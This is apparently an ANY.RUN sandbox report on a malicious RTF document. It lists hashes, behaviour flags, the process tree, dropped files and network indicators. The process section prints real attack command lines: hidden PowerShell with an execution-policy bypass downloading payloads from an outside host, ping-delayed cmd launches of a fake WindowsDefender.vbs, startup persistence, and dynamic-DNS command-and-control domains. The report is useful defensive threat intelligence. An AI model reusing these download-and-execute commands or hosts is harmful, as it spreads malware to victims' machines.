analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

631f70e71fc0b3170069e3a9b2e51b47

Full analysis: https://app.any.run/tasks/9d45e690-e7a5-4c7f-ba0b-6408287bc2a0
Verdict: Malicious activity
Analysis date: July 18, 2019, 03:08:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

631F70E71FC0B3170069E3A9B2E51B47

SHA1:

BB0D114862B66100BD958B4D83A8BD739E10217B

SHA256:

4EB760FC5FFB293CFFE8CEF0C9B2495A334057FFA2EF50B2CBC5FBFCB6F8800D

SSDEEP:

768:qaKf8YDEX6w3Mz6B7hEfHPtEU7CPJF4u+OmaRB4nJjOhi/WDf+DfP5dlAZkY7S4h:qfN4CHmUWX4ZO3KMhpD8P5DnY7ScttL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3952)

    • Writes to a start menu file

      • WScript.exe (PID: 2180)
      • amsi.dll (PID: 2440)
      • wscript.exe (PID: 3088)
      • amsi.dll (PID: 4092)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3952)

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2360)
      • cmd.exe (PID: 2520)
      • cmd.exe (PID: 2828)
      • cmd.exe (PID: 3688)
      • cmd.exe (PID: 3044)
      • cmd.exe (PID: 2444)
      • cmd.exe (PID: 2944)

    • Application was dropped or rewritten from another process

      • WScript.exe (PID: 2180)
      • amsi.dll (PID: 2440)
      • wscript.exe (PID: 3088)
      • outlook.exe (PID: 3380)
      • amsi.dll (PID: 4092)
      • outlook.exe (PID: 2652)
      • outlook.exe (PID: 3676)
      • outlook.exe (PID: 3852)

    • Loads dropped or rewritten executable

      • WScript.exe (PID: 2180)
      • cmd.exe (PID: 2360)
      • amsi.dll (PID: 2440)
      • wscript.exe (PID: 3088)

    • Changes the autorun value in the registry

      • amsi.dll (PID: 2440)
      • amsi.dll (PID: 4092)

  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 3952)

    • Executes scripts

      • cmd.exe (PID: 2360)
      • amsi.dll (PID: 2440)

    • Executable content was dropped or overwritten

      • WScript.exe (PID: 2180)
      • powershell.exe (PID: 4016)

    • Starts itself from another location

      • WScript.exe (PID: 2180)
      • amsi.dll (PID: 2440)
      • wscript.exe (PID: 3088)

    • Creates files in the user directory

      • WScript.exe (PID: 2180)
      • powershell.exe (PID: 4016)
      • powershell.exe (PID: 3384)
      • powershell.exe (PID: 2364)
      • powershell.exe (PID: 2616)

    • Starts application with an unusual extension

      • WScript.exe (PID: 2180)
      • wscript.exe (PID: 3088)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2180)
      • wscript.exe (PID: 3088)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2180)
      • wscript.exe (PID: 3088)

    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 4004)
      • cmd.exe (PID: 3988)

    • Reads Internet Cache Settings

      • amsi.dll (PID: 2440)
      • amsi.dll (PID: 4092)

    • Creates files in the program directory

      • AdobeARM.exe (PID: 3304)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2992)
      • EXCEL.EXE (PID: 3952)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2992)
      • EXCEL.EXE (PID: 3952)

    • Application launched itself

      • AcroRd32.exe (PID: 2852)
      • RdrCEF.exe (PID: 3488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57433
CharactersWithSpaces: 39
Characters: 34
Words: 6
Pages: 1
TotalEditTime: 3 minutes
RevisionNumber: 1
ModifyDate: 2019:06:13 02:00:00
CreateDate: 2019:06:13 01:57:00
LastModifiedBy: Karla
Author: Karla
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
91
Monitored processes
43
Malicious processes
6
Suspicious processes
6

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe cmd.exe no specs ping.exe no specs wscript.exe amsi.dll powershell.exe cmd.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs taskkill.exe no specs taskkill.exe no specs wscript.exe outlook.exe acrord32.exe amsi.dll acrord32.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs taskkill.exe no specs taskkill.exe no specs outlook.exe no specs rdrcef.exe no specs rdrcef.exe no specs rdrcef.exe no specs outlook.exe no specs acrord32.exe no specs acrord32.exe no specs outlook.exe no specs adobearm.exe no specs reader_sl.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2992"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\631f70e71fc0b3170069e3a9b2e51b47.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
3952"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
2360"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & start C:\Users\Public\WindowsDefender.vbsC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2872ping 127.0.0.1 -n 5 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2180"C:\Windows\System32\WScript.exe" "C:\Users\Public\WindowsDefender.vbs" C:\Windows\System32\WScript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2440"C:\Users\admin\AppData\Local\Temp\amsi.dll" "C:\Users\Public\WindowsDefender.vbs"C:\Users\admin\AppData\Local\Temp\amsi.dll
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4016"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://ciginfo.websiteseguro.com/logs/async.mp3','C:\Users\Public\outlook.exe')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2520"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\outlook.exeC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2828"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 15 > nul & start ,C:\Users\Public\outlook.exeC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3384"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://ciginfo.websiteseguro.com/logs/documento.mp3','C:\Users\admin\AppData\Local\Temp\documento.pdf')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
4 043
Read events
3 621
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
14
Text files
28
Unknown types
19

Dropped files

PID
Process
Filename
Type
2992WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAD66.tmp.cvr
MD5:
SHA256:
3952EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB9CA.tmp.cvr
MD5:
SHA256:
4016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EF8SWUGZ5BRSRZWG8FQ8.temp
MD5:
SHA256:
3384powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JYO1GRH5KPMS1OO0BYRA.temp
MD5:
SHA256:
2180WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.vbstext
MD5:DAED6E226C8142E594B1CDB9CB5CF613
SHA256:75F0A5A64F83A36FCDD4142B7D5211EF02E9F7CA1FBD80EEF59B4DA108C3856D
3952EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A2A29620-6BE0-4ABE-BE5A-8D431E762DCE}.tmpbinary
MD5:8BE9060AA7D61D28091FE63819AC3CCC
SHA256:457BA0FF1F6C3C470A7F071FA46182B37B1D9B89383A06A16618FC9490B88CF8
4016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17e493.TMPbinary
MD5:47388A8B771AD359484FBDBC4C2AF508
SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0
3384powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17e4f1.TMPbinary
MD5:47388A8B771AD359484FBDBC4C2AF508
SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0
3952EXCEL.EXEC:\Users\Public\WindowsDefender.vbstext
MD5:DAED6E226C8142E594B1CDB9CB5CF613
SHA256:75F0A5A64F83A36FCDD4142B7D5211EF02E9F7CA1FBD80EEF59B4DA108C3856D
2992WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$1f70e71fc0b3170069e3a9b2e51b47.rtfpgc
MD5:9AF85483D1D4BA9BEE5216F5D0A0BA61
SHA256:603DBEFE7F86FB6496E5F3862E016C33E17AF988A030E407C9FA5627B37DCA10
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
32
DNS requests
10
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2852
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip
unknown
whitelisted
2852
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip
unknown
whitelisted
2852
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/278_15_23_20070.zip
unknown
whitelisted
2852
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3952
EXCEL.EXE
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
4092
amsi.dll
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
2.21.36.203:443
armmf.adobe.com
GTT Communications Inc.
FR
suspicious
2852
AcroRd32.exe
2.21.36.203:443
armmf.adobe.com
GTT Communications Inc.
FR
suspicious
4016
powershell.exe
191.252.51.54:443
ciginfo.websiteseguro.com
Locaweb Serviços de Internet S/A
BR
unknown
3384
powershell.exe
191.252.51.54:443
ciginfo.websiteseguro.com
Locaweb Serviços de Internet S/A
BR
unknown
2.18.233.74:443
ardownload2.adobe.com
Akamai International B.V.
whitelisted
3380
outlook.exe
152.253.153.118:6606
soucdtevoceumcuzao.duckdns.org
TELEFÔNICA BRASIL S.A
BR
unknown
2440
amsi.dll
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
4092
amsi.dll
152.246.81.100:9000
bylgay.hopto.org
TELEFÔNICA BRASIL S.A
BR
malicious

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
ciginfo.websiteseguro.com
  • 191.252.51.54
unknown
soucdtevoceumcuzao.duckdns.org
  • 152.253.153.118
malicious
bylgay.hopto.org
  • 152.246.81.100
malicious
acroipm2.adobe.com
  • 2.16.186.33
  • 2.16.186.32
whitelisted
armmf.adobe.com
  • 2.21.36.203
whitelisted
ardownload2.adobe.com
  • 2.18.233.74
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Process
Message
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
631f70e71fc0b3170069e3a9b2e51b47